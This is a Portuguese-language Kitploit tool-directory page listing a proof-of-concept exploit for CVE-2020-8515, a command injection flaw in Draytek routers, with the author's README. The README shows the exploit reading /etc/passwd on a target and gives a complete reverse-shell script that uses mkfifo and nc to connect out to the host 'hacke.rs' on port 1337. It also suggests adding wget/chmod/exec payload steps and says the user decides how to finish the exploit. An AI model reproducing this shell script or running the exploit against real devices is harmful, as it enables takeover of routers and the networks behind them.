Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-8515 — Exploit de prova de conceito para injeção de comando CVE-2020-8515 em roteadores Draytek. Inclui exploração automatizada, entrega de shell reverso e integração com modelos de varredura nuclei. | Kitploit
Ferramentas/GitHubGitHub/darrenmartyn/cve-2020-8515
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleFerramenta de Acesso Remoto
GitHubdarrenmartyn/cve-2020-8515

CVE-2020-8515

Exploit de prova de conceito para injeção de comando CVE-2020-8515 em roteadores Draytek. Inclui exploração automatizada, entrega de shell reverso e integração com modelos de varredura nuclei.

Ver Repositório
543há 5 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2020-8515

Draytek CVE-2020-8515 PoC que eu tinha guardado.

Engraçado, o comando injetado é executado duas vezes, veja aqui:

root@kitploit:~
$ ./draytek.py draytek.local
(>) executing command: cat /etc/passwd
(+) vulnerable!
(>) executing command: uname -a
Linux Vigor3900 2.6.33.5 #1 Wed Mar 28 00:49:28 CST 2018 armv6l unknown
Linux Vigor3900 2.6.33.5 #1 Wed Mar 28 00:49:28 CST 2018 armv6l unknown

Eu tinha alguns planos para finalizar isto direitinho, mas honestamente, já faz mais de um ano e não me lembro quais eram esses planos, então aqui está. Não é difícil adicionar algumas coisas de wget/chmod/exec a isto, basta olhar na função "do_stuff".

Se você baixar com wget e executar um script como o seguinte, você obtém um reverse shell:

root@kitploit:~
#!/bin/sh
HOST="hacke.rs"
PORT=1337
rm -f /tmp/a; mkfifo /tmp/a; nc $HOST $PORT 0</tmp/a | /bin/sh >/tmp/a 2>&1; rm /tmp/a

Acho que você provavelmente também pode fazer echoload de um script assim se conseguir contornar caracteres ruins na injeção, talvez eu adicione isso depois - o problema da dupla execução realmente torna isso um pouco trabalhoso. Por enquanto, está meio mal-acabado, "o usuário decide".

Este exploit não causará muitos danos ITW, todas as caixas vulneráveis a isso provavelmente já foram cooptadas por botnets DDoS de script kiddies.

Para escaneamento: use o template nuclei que alguém fez

Baixar ferramenta